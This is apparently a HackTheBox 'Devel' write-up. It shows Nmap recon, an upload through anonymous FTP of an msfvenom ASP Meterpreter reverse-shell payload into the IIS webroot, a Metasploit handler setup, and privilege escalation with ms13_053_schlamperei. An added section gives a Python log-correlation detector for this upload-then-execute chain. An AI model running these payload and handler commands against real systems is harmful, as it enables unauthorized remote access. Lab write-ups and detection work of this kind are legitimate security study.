Devel Challenge HackTheBox

Step 1 - Recon

When testing, almost always, my initial scanning includes Nmap, Nikto and Dirbuster. Starting with Nmap we have:

 nmap -sS -A -T4 --top-ports 500 10.10.10.5

 Nmap scan report for 10.10.10.5
 Host is up (0.052s latency).
 Not shown: 998 filtered ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp Microsoft ftpd
 80/tcp open http Microsoft IIS httpd 7.5
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

In parallel I fired nikto and dirbuster but nothing important came up. Based on the nmap results, ports 21 (FTP) and 80 (Microsoft IIS) are open. It isn't so common to see the FTP port open, so let's try and access it. Apparently you can access the server files using FTP via anonymous login.



Step 2 - Exploit

Awesome, we can now generate an .asp shell using msfvenom [1].

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipaddress LPORT=port -f asp > shell.asp

Then upload it to the server using FTP.

 ftp 10.10.10.5
 ftp> put shell.asp

Final step: fire up msfconsole and set up the handler:

 msf> use exploit/multi/handler
 msf> set payload windows/meterpreter/reverse_tcp
 msf> set LHOST ipaddress
 msf> set LPORT port
 msf> exploit -j

Then access http://10.10.10.5/shell.asp and wait for the connection to take place.

...Nothing...

Apparently my shell was not working. At the time that was a bit weird, but in order to see what's going on, a friend of mine suggested building a Windows 7 VM with IIS to see what's wrong [2]. I tried to set it up with the same permissions I had in the box and then checked the shell.asp code. Allowing errors to show in IIS helped me identify that in line 60 (see Image below) my shellcode tried to create a file in a location that the user could not write, so we need to modify that.

As a result, I changed it to C:\inetpub\wwwroot\file.exe where I was sure I could write.

Tried again and boom, we have a working shell.

Now, since we are looking for a quick win here, we run getsystem [3], but we get an Operation Failed: Access is Denied. However, we can then run a pretty neat Metasploit post-exploitation script called local_exploit_suggester.

The best technique you could use now is trial and error, until you find a working exploit. If all of them fail, then there are other techniques that we could use (Powershell, etc - Maybe in another writeup). Here, it is a bit easier because the ms13_053_schlamperei exploit works.
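The chain that got us in (an anonymous FTP STOR of a script into the webroot, followed by a GET of that same file over HTTP) is also exactly what a defender would look for in the server's logs. The following is an added example, not code from the original writeup; the log column layouts and the sample lines are constructed for it, so adapt the field lists to the #Fields: header of your own W3C logs.

```python
"""Correlate anonymous FTP uploads with later HTTP requests for the same file.
Added example for the STOR shell.asp -> GET /shell.asp chain in this writeup.
Column layouts and sample lines are constructed, not taken from a real server.
"""
from datetime import datetime

EXECUTABLE_EXTS = (".asp", ".aspx", ".ashx", ".asmx")  # IIS executes these from the webroot

# Constructed FTP log: date time c-ip cs-username cs-method cs-uri-stem sc-status
FTP_LOG = """\
2017-03-17 10:01:09 10.10.14.3 anonymous STOR shell.asp 226
2017-03-17 10:05:30 10.10.14.9 anonymous RETR iisstart.htm 226
"""
# Constructed IIS web log: date time c-ip cs-method cs-uri-stem sc-status
WEB_LOG = """\
2017-03-17 10:01:15 10.10.14.3 GET /shell.asp 200
2017-03-17 10:02:00 10.10.14.9 GET /iisstart.htm 200
"""
FTP_FIELDS = ["date", "time", "c-ip", "cs-username", "cs-method", "cs-uri-stem", "sc-status"]
WEB_FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "sc-status"]


def parse(text, fields):
    """Split whitespace-separated log lines into dicts and add a datetime under 'ts'."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):  # skip blanks and W3C header lines
            continue
        row = dict(zip(fields, line.split()))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def find_upload_then_execute(ftp_text, web_text, window_s=3600):
    """Return (client_ip, filename) for every server-side script stored by the
    anonymous FTP user that is then requested over HTTP within window_s seconds."""
    hits = []
    for up in parse(ftp_text, FTP_FIELDS):
        name = up["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        if up["cs-method"] != "STOR" or up["cs-username"] != "anonymous" \
                or not name.endswith(EXECUTABLE_EXTS):
            continue
        for req in parse(web_text, WEB_FIELDS):
            delta = (req["ts"] - up["ts"]).total_seconds()
            if req["cs-uri-stem"].rsplit("/", 1)[-1].lower() == name and 0 <= delta <= window_s:
                hits.append((up["c-ip"], name))
                break  # one alert per upload is enough
    return hits


if __name__ == "__main__":
    for ip, fname in find_upload_then_execute(FTP_LOG, WEB_LOG):
        print(f"ALERT: {ip} uploaded {fname} via anonymous FTP and IIS then served it")
```

The real fix is not letting the anonymous FTP user write into wwwroot at all; the correlation above is the compensating detection for when that permission exists.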



Lessons learned

I believe that these types of boxes, which are easy to pwn, are also able to teach someone a few important lessons. One of them is the fact that you should never rely 100% on the tools you are using, and if you are stuck, always try to simulate the situation you are in, in order to understand what's going wrong. The last thing to take away from this writeup is that Metasploit is an amazing framework with loads of exploits and post-exploitation techniques.

References

[1] Msfvenom - Exploit Development
[2] Running IE Virtual Machines from Microsoft under Linux via VirtualBox
[3] Getsystem and Privilege Escalation